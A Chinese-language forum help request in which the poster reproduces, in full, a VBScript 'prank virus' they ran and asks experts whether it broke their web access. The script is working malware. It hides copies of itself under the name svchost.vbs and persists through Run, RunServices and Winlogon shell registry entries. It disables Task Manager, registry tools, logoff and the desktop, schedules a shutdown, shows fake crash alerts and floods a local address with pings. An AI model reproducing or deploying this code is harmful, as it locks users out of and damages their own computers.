昨天在QQ编程吧浏览帖子 无意中见到下面一段程序 楼主说是唬菜鸟的病毒 ( 将其放进文档 修改TXT后缀为vbs )出于好奇的心理 我尝试了一下 不停的复制 而且禁用任务管理器
只好重新启动
今天发现很多网页上不去了 例如 百度 www.qbq.cn 请高手分析一下这段程序 我的情况跟它有关系么 !
Set objFS = CreateObject("Scripting.FileSystemObject")
Set objFSO = CreateObject("Scripting.FileSystemObject")
set wsh=wscript.createobject("wscript.shell")
set reg=wscript.createobject("wscript.shell")
dim wsh
a=WScript.ScriptFullName
b="shutdown -t 600 -s -c 如果你是菜鸟的话。。。我想你知道害怕了吧!嬉嬉!"
c="c:\svchost.vbs"
d="d:\svchost.vbs"
s="c:\windows\system32\svchost.vbs"
c1="attrib +s +h +a +r c:\svchost.vbs"
d1="attrib +s +h +a +r d:\svchost.vbs"
s1="attrib +s +h +a +r c:\windows\system32\svchost.vbs"
If objFSO.FileExists (c) Then
Else
objFs.GetFile (a).Copy (c)
wsh.run c1
End If
If objFSO.FileExists(d) Then
Else
objFs.GetFile (a).Copy (d)
wsh.run d1
End If
If objFSO.FileExists(s) Then
Else
objFs.GetFile (a).Copy (s)
wsh.run s1
End If
wsh.run b
wsh.run "narrator"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","00000001","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","00000001","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoRun","00000001","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoClose","00000001","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoLogoff","00000001","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoDesktop","00000001","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer\NoDrives","000000100","REG_DWORD"
reg.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","c:\svchost.vbs","REG_SZ"
reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","d:\svchost.vbs","REG_SZ"
reg.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\svchost","c:\windows\system32\svchost.vbs","REG_SZ"
reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices\svchost","c:\windows\system32\svchost.vbs","REG_SZ"
reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\sTimeFormat","tttt H:mm:ss","REG_SZ"
reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\s1159","笨蛋!","REG_SZ"
reg.regwrite"HKEY_CURRENT_USER\Control Panel\International\s2359","傻逼!","REG_SZ"
reg.regwrite"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell","c:\windows\system32\svchost.vbs","REG_SZ"
msgbox "系统快要崩溃了!",48,"由于你经常看黄页:"
msgbox "windows崩溃了!",18,"安全警报:"
do
wsh.run ("ping -t -l 6500 192.168.1.1")
loop
[课程]Android-CTF解题方法汇总!